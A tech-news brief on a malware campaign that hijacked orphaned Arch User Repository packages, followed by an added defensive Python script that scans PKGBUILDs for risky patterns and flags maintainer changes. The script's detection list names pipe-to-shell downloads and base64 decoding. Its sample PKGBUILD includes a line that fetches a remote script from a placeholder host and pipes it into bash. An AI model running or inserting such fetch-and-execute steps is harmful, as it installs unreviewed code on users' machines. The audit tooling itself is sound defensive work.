Arch User Repository hit by sustained malware attack; new user registration suspended
Tags OSS · Security · Supply Chain
The Arch User Repository (AUR), a community-driven package repository for Arch Linux with over 107,000 packages and 141,000 registered users, has been subjected to a sustained attack. Attackers created new accounts, adopted orphaned packages, and pushed malicious updates designed to install malware on users' systems. AUR maintainers spent several days in a 'Whac-A-Mole' response to each newly compromised package. The project has suspended new user registration indefinitely. The attack exploited the AUR's open collaboration model, which has no formal review process for package adoption or updates — any registered user can adopt orphaned packages with a single click.
Technical significance
This attack highlights the supply chain risks inherent in open-source repositories with minimal gatekeeping. With 14,000 orphaned packages available for immediate adoption and no review process, the AUR's trust model proved vulnerable. The incident may force a broader reckoning across the open-source ecosystem about how to balance openness with security, particularly as AUR helpers automate package installation for millions of users.
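The risk described above (an orphaned package adopted by a fresh account, then updated with a PKGBUILD that an AUR helper builds and installs without review) is something a user can partly defend against locally by inspecting what is about to run. The following script is an added example, not code from the article or from the Arch Linux / AUR project: it audits a PKGBUILD with a small set of heuristics (my own assumptions, not an official Arch list) and flags packages whose maintainer changed since the last time they were seen. The PKGBUILD text and the maintainer snapshots are constructed samples.

```python
"""
Added example (not from the article or the Arch/AUR project): a pre-build
audit for AUR PKGBUILDs, the kind of gate an AUR helper user could run before
makepkg executes build()/package(). Heuristics are assumptions; inputs below
are constructed for illustration.
"""
import re

# Assumed heuristics: patterns in a build/package function that deserve a
# human look before the function is executed on the user's machine.
RISKY_PATTERNS = [
    (r"curl[^\n|]*\|\s*(ba)?sh", "pipes a download straight into a shell"),
    (r"wget[^\n|]*\|\s*(ba)?sh", "pipes a download straight into a shell"),
    (r"base64\s+(-d|--decode)", "decodes base64 at build time"),
    (r"\beval\b", "uses eval"),
    (r"(~|\$HOME)/\.config/systemd/user", "touches user systemd units"),
    (r"\$HOME/\.(bashrc|profile|zshrc)", "modifies a shell startup file"),
]

def parse_functions(pkgbuild: str) -> dict:
    """Split a PKGBUILD into its shell functions: name -> body text."""
    funcs = {}
    for m in re.finditer(r"^(\w+)\s*\(\)\s*\{(.*?)^\}", pkgbuild, re.S | re.M):
        funcs[m.group(1)] = m.group(2)
    return funcs

def source_urls(pkgbuild: str) -> list:
    """Return the URLs declared in source=(...); these are checksum-verified."""
    m = re.search(r"^source=\((.*?)\)", pkgbuild, re.S | re.M)
    if not m:
        return []
    cleaned = m.group(1).replace('"', "").replace("'", "")
    return re.findall(r"https?://\S+", cleaned)

def audit_pkgbuild(pkgbuild: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    # 'SKIP' checksums disable makepkg's integrity check on the sources.
    if re.search(r"^\w*sums=\([^)]*SKIP", pkgbuild, re.M):
        findings.append("checksums: SKIP disables makepkg integrity verification")
    declared = set(source_urls(pkgbuild))
    for name, body in parse_functions(pkgbuild).items():
        for pattern, why in RISKY_PATTERNS:
            if re.search(pattern, body):
                findings.append(f"{name}(): {why}")
        # Downloads performed inside a function bypass source=() verification.
        for url in re.findall(r"https?://\S+", body):
            if url.strip("'\")") not in declared:
                findings.append(f"{name}(): fetches {url} outside source=()")
    return findings

def adoptions(previous: dict, current: dict) -> list:
    """Packages whose maintainer differs from the last snapshot, including an
    orphan (None) that now has an owner. Snapshots map pkgname -> maintainer;
    in practice they would come from the helper's cache and AUR metadata."""
    return [name for name, maint in current.items()
            if name in previous and previous[name] != maint]

# Constructed sample: a package whose package() step pulls and runs a script
# that is not part of the verified sources.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/example-tool-1.2.3.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/example-tool-$pkgver"
  make
}

package() {
  cd "$srcdir/example-tool-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s https://example.invalid/post-install.sh | bash
}
"""

# Constructed snapshots: the package went from orphaned to a new owner.
PREVIOUS_MAINTAINERS = {"example-tool": None, "other-tool": "alice"}
CURRENT_MAINTAINERS = {"example-tool": "newuser42", "other-tool": "alice"}

if __name__ == "__main__":
    for finding in audit_pkgbuild(SAMPLE_PKGBUILD):
        print("FLAG", finding)
    for name in adoptions(PREVIOUS_MAINTAINERS, CURRENT_MAINTAINERS):
        print("ADOPTED", name, "-> review before building")
```

The two checks complement each other: a maintainer change is a signal to read the PKGBUILD diff rather than let the helper proceed, and the pattern scan catches the case where the malicious behaviour lives in build() or package() instead of in the declared sources. Neither replaces reading the file; they only decide when that reading is mandatory.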